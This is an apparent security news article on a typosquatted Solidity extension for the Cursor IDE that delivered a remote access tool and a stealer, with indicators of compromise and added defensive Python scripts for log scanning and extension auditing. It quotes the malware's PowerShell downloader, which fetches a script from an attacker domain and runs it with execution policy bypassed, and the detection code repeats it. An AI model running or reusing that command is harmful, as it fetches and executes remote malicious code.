
A sophisticated attack involving a malicious VSCode extension in the Cursor AI IDE resulted in the theft of $500,000 in cryptocurrency from a Russian developer. The fake extension, masquerading as a Solidity syntax highlighter, delivered remote access tools and information stealers to compromised systems. This incident highlights growing concerns about supply chain attacks targeting developer tools.
Attack Vector and Technical Details
The malicious extension named “Solidity Language” was uploaded to the Open VSX registry, posing as a legitimate tool for Ethereum smart contract development. Researchers from Kaspersky and BleepingComputer identified it as a typosquatting attempt against the legitimate “juanblanco/solidity” extension, with subtle character substitutions in the publisher name [1,2]. The extension contained a PowerShell script that downloaded additional payloads from the domain angelic[.]su, including ScreenConnect RAT and PureLogs stealer malware.
The attack chain began when developers installed the extension, which then executed the following PowerShell command:
```powershell
Invoke-WebRequest -Uri "http://angelic[.]su/1.txt" -OutFile "$env:TEMP\payload.ps1";
Start-Process powershell -ArgumentList "-ExecutionPolicy Bypass -File $env:TEMP\payload.ps1"
```
Security analysts discovered the malware used advanced evasion techniques, including embedding the VMDetector loader within a PNG file hosted on archive[.]org. This loader employed XOR encryption to conceal its command-and-control infrastructure, which resolved to relay.lmfao[.]su [2].
Impact and Campaign Statistics
The malicious extension reportedly achieved 54,000 downloads before being removed, though researchers suspect many were artificially inflated by bots. A subsequent clone named “solidity” appeared with over 2 million claimed downloads, demonstrating the attackers’ persistence [1]. The primary victim, a Russian cryptocurrency developer, lost $500,000 when attackers gained access to their wallet credentials through the installed information stealer.
Kaspersky’s analysis linked the attack to known patterns from the Dark Partners cybercrime group, which has been associated with previous cryptocurrency theft campaigns [2]. The malware specifically targeted:
- Browser-stored cryptocurrency wallet credentials
- Two-factor authentication tokens
- Development environment configuration files
Detection and Mitigation
Security teams should monitor for connections to the identified IoCs and review installed extensions in developer environments. Kaspersky recommends verifying extension publishers and using tools like their Open-Source Feed to identify potentially malicious packages [2]. The following indicators were associated with this campaign:
| Type | Indicator |
|---|---|
| Domains | angelic[.]su, lmfao[.]su, staketree[.]net |
| Payloads | 1.txt, 2.txt (PowerShell scripts) |
| File Hash | 2c471e265409763024cdc33579c84d88d5aaf9aea1911266b875d3b7604a0eeb |
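The checks a detection team would actually run on the material above, as an added example that is not code from the article or from the researchers it cites: it refangs the published domains, matches them (and any subdomain, so relay.lmfao[.]su hits lmfao[.]su) and the published hash against log lines, and also looks for the behavioural pattern of the first-stage command quoted earlier (Invoke-WebRequest into %TEMP% followed by -ExecutionPolicy Bypass). The proxy, DNS, Sysmon-style and EDR-style log lines are constructed for the example; the field layout is an assumption and would need adapting to real telemetry.

```python
"""Match the article's network indicators and the downloader's PowerShell
pattern against log lines. Added example, not code from the article or from
the researchers it cites; the log lines below are constructed."""
import re
from typing import Dict, List, Optional

# Indicators as published in the article, in defanged form.
DEFANGED_DOMAINS = ["angelic[.]su", "lmfao[.]su", "staketree[.]net"]
KNOWN_HASH = "2c471e265409763024cdc33579c84d88d5aaf9aea1911266b875d3b7604a0eeb"


def refang(indicator: str) -> str:
    """Turn a defanged indicator (angelic[.]su, hxxp://) into its matchable form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").lower()


IOC_DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}


def domain_matches(hostname: str) -> Optional[str]:
    """Return the matching IoC if hostname is that domain or any subdomain of it
    (so relay.lmfao.su matches lmfao.su), else None."""
    host = hostname.lower().rstrip(".")
    for ioc in IOC_DOMAINS:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None


# Behavioural pattern of the first stage quoted in the article: fetch a script
# into %TEMP% with Invoke-WebRequest, then run it with -ExecutionPolicy Bypass.
DOWNLOADER_RE = re.compile(
    r'Invoke-WebRequest.*-OutFile\s+"?\$env:TEMP\\.*\.ps1'
    r'|-ExecutionPolicy\s+Bypass\s+-File\s+"?\$env:TEMP\\',
    re.IGNORECASE,
)

# Hostnames appear after a URL scheme or in a query=/host= field in these logs
# (assumed field names for the constructed format).
HOST_RE = re.compile(r"(?:https?://|query=|host=)([A-Za-z0-9.-]+)")


def scan_line(line: str) -> List[str]:
    """Return the findings for one log line (empty list when nothing matches)."""
    findings: List[str] = []
    for m in HOST_RE.finditer(line):
        ioc = domain_matches(m.group(1))
        if ioc:
            findings.append(f"ioc-domain:{ioc}")
    if KNOWN_HASH in line.lower():
        findings.append("ioc-hash")
    if DOWNLOADER_RE.search(line):
        findings.append("powershell-temp-downloader")
    return findings


def scan_logs(lines: List[str]) -> Dict[int, List[str]]:
    """Map 1-based line numbers to findings, keeping only lines that matched."""
    return {i: f for i, line in enumerate(lines, 1) if (f := scan_line(line))}


# Constructed sample lines in a proxy / DNS / Sysmon / EDR style (not real telemetry).
SAMPLE_LOGS = [
    "proxy ts=2025-07-10T09:00:01Z user=dev1 url=https://marketplace.visualstudio.com/items",
    "proxy ts=2025-07-10T09:00:07Z user=dev1 url=http://angelic.su/1.txt",
    "dns ts=2025-07-10T09:00:12Z client=10.0.0.5 query=relay.lmfao.su type=A",
    'sysmon ts=2025-07-10T09:00:09Z EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -ExecutionPolicy Bypass -File $env:TEMP\\payload.ps1"',
    f"edr ts=2025-07-10T09:00:15Z event=file_create path=C:\\Users\\dev1\\AppData\\Local\\Temp\\stage.bin sha256={KNOWN_HASH.upper()}",
]

if __name__ == "__main__":
    for lineno, findings in scan_logs(SAMPLE_LOGS).items():
        print(f"line {lineno}: {', '.join(findings)}")
```

The behavioural regex is the more durable of the three checks: the domains and hash are specific to this campaign and will be rotated, whereas a PowerShell process that pulls a script into %TEMP% and immediately runs it with the execution policy bypassed is worth an alert on a developer workstation regardless of which domain it talks to.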
Broader Implications for Developer Tools
This incident follows a pattern of increasing attacks against software development infrastructure. The Open VSX registry, like npm and other package repositories, has become a prime target due to the high level of trust developers place in these ecosystems. AI-powered IDEs like Cursor present particularly attractive targets as they often handle sensitive credentials and intellectual property [1].
Kaspersky’s 2025 SMB Threat Report notes a 50% increase in attacks targeting collaboration and development tools over the past year [2]. This trend suggests that organizations need to implement stricter controls around development environment security, including:
- Restricting extension installation to vetted sources
- Monitoring for unusual network activity from development systems
- Implementing separate environments for development and cryptocurrency operations
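One concrete form of the first control above, and of Kaspersky's advice to verify extension publishers, as an added example that is not code from the article or from any IDE vendor: an audit that reads every installed extension's manifest and classifies it as vetted, as a lookalike of a vetted extension (same or near-identical name or publisher, but not the vetted pair, which is exactly the shape of the “solidity” impersonation described above), or as simply not on the allowlist. It assumes the VS Code layout of one `<publisher>.<name>-<version>/package.json` per extension, which Cursor shares; the three manifests it scans are constructed, and the impersonating publisher `so1idity` and the version numbers are placeholders rather than values from the article.

```python
"""Audit the extensions installed in a VS Code-style IDE against an allowlist
of vetted publisher/name pairs and flag lookalikes. Added example, not code
from the article or from any vendor; the manifests it scans are constructed."""
import json
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# Vetted (publisher, name) pairs, lower-cased. The single entry is the
# legitimate Solidity extension the article names; a team would extend this.
ALLOWED: Dict[Tuple[str, str], str] = {
    ("juanblanco", "solidity"): "Solidity language support",
}

# Characters commonly swapped for lookalikes in typosquatted names.
LOOKALIKES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s",
                            "-": None, "_": None, ".": None})


def normalize(s: str) -> str:
    """Lower-case and fold lookalike characters so 'so1idity' compares as 'solidity'."""
    return s.lower().translate(LOOKALIKES)


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance (row-by-row dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def read_manifests(ext_dir: Path) -> List[dict]:
    """Load every <ext_dir>/*/package.json; skip unreadable or corrupt ones
    rather than aborting the whole audit."""
    manifests = []
    for pkg in sorted(ext_dir.glob("*/package.json")):
        try:
            data = json.loads(pkg.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        data["_dir"] = pkg.parent.name
        manifests.append(data)
    return manifests


def classify(manifest: dict) -> str:
    """'allowed' for a vetted pair; 'lookalike-of:<pub>.<name>' when the name or
    publisher is within one edit of a vetted one but the pair itself is not
    vetted; otherwise 'not-allowlisted'."""
    publisher = str(manifest.get("publisher", "")).lower()
    name = str(manifest.get("name", "")).lower()
    if (publisher, name) in ALLOWED:
        return "allowed"
    for ok_pub, ok_name in ALLOWED:
        name_close = edit_distance(normalize(name), normalize(ok_name)) <= 1
        pub_close = edit_distance(normalize(publisher), normalize(ok_pub)) <= 1
        if name_close or pub_close:
            return f"lookalike-of:{ok_pub}.{ok_name}"
    return "not-allowlisted"


def audit(ext_dir: Path) -> Dict[str, str]:
    """Map each extension directory name to its classification."""
    return {m["_dir"]: classify(m) for m in read_manifests(ext_dir)}


def build_sample_dir() -> Path:
    """Write three constructed manifests into a temp directory. The publisher
    'so1idity' and the version numbers are placeholders, not values from the
    article."""
    root = Path(tempfile.mkdtemp(prefix="ext-audit-"))
    samples = {
        "juanblanco.solidity-0.0.0": {"publisher": "JuanBlanco", "name": "solidity"},
        "so1idity.solidity-0.0.0": {"publisher": "so1idity", "name": "solidity",
                                    "displayName": "Solidity Language"},
        "ms-python.python-0.0.0": {"publisher": "ms-python", "name": "python"},
    }
    for dirname, manifest in samples.items():
        d = root / dirname
        d.mkdir()
        (d / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    return root


if __name__ == "__main__":
    # On a real workstation point this at ~/.vscode/extensions or
    # ~/.cursor/extensions (assumed default locations) instead of the sample dir.
    for ext, verdict in audit(build_sample_dir()).items():
        print(f"{ext}: {verdict}")
```

The lookalike rule deliberately keys on the publisher/name pair rather than on the display name, because the display name is free text an attacker can set to anything; the manifest `name` and `publisher` are what the registry identifies the package by. For enforcement rather than audit, VS Code's `extensions.allowed` setting can restrict installs to listed publishers or extensions; whether a given Cursor build honours that setting is something to verify before relying on it.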
The $500,000 cryptocurrency theft demonstrates the real-world consequences of these supply chain attacks. As development tools become more complex and interconnected, security teams must adapt their monitoring and protection strategies to address these emerging threats.
References
1. “Malicious VSCode extension in Cursor IDE led to $500K crypto theft”, BleepingComputer, Jul. 14, 2025.
2. “Open-source package for Cursor AI turned into a crypto heist”, Kaspersky Securelist, Jul. 10, 2025.
3. “Hackers steal $500K in crypto through malicious IDE extension”, CyberPress, Jul. 10, 2025.
4. BleepingComputer Twitter thread, Jul. 14, 2025.